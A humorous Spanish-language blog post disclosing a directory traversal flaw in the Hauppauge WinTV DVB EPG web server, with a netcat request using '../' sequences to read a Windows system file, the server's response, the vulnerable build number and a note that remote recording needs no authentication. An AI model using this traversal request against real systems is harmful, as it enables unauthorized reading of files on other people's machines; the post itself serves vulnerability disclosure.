Cuidado con la telebasura
Los últimos estudios demuestran que la televisión es perjudicial para la salud, tanto para la mental por matar más neuronas que una litrona de whisky de garrafón (pobre Mario), como para la salud de tu ordenador.
Si eres de los que usa tarjetas de televisión WinTV de Hauppauge y gorros de papel de plata, estás de enhorabuena, desde 48bits te vamos a dar la razón para que dejes de utilizarla y te dediques a hacer algo más interesante, como ver porno en youtube.
El otro día cometí el error de instalar Windows Vista Ultimate para comprobar que tal funcionaba el media center, así que rapidamente fui a instalar todos los drivers disponibles para mi hardware, e incluso reciclar una Wintv HVR-1100 que tenía en el cajón. El software de WinTV, que directamente brilla por la ausencia de calidad, incluía un paquete llamado EPG, «Electronic program guide» que se ejecuta como un servicio y que sirve para visualizar, tanto local como remotamente la programación de la televisión, y así permitir via HTTP, grabar programas, como el teletienda, para su posterior visionado en MPEG4.
Cuando ojee por primera vez este software con un navegador, lo primero que me llamó la atención era que estaba escuchando por defecto en el puerto 80/tcp y que en el navegador veía algo así como «Hauppauge’s DVB EPG Webserver v0.5, generated Mon, 13 Oct 2008 10:12:39 GMT».
Como me conozco como funcionan las versiones betas, decidí probar algo arriesgado (XD), analizar el parser de HTTP. No voy a entrar en mucho detalle… porque no es necesario…
C:\>nc 192.168.1.2 80
GET /../../../../../Users/desktop.ini HTTP/1.0HTTP/1.0 200 OK
Date: Mon, 13 Oct 2008 09:52:01 GMT
Server: HCW_DVB_EPG_SERVER_0_1
Accept-Ranges: bytes
Content-Length: 174
Connection: close
Content-Type: text/html■
[ . S h e l l C l a s s I n f o ]
L o c a l i z e d R e s o u r c e N a m e = @ % S y s t e m R o o t % \ s y s t e m 3 2 \ s h e l l 3 2 . d l
l , – 2 1 8 1 3
Lo peor, aparte de esto, es que no se requiere ningún tipo de autorización/autenticación para programar tareas remotamente, por lo que cuando llegues a casa, a lo mejor te encuentras en tu disco duro con toda la temporada de «verano azul»
La versión de EPG vulnerable a un directory transversal es la última disponible hasta la fecha, la DVB-T EPG build 1.6.26136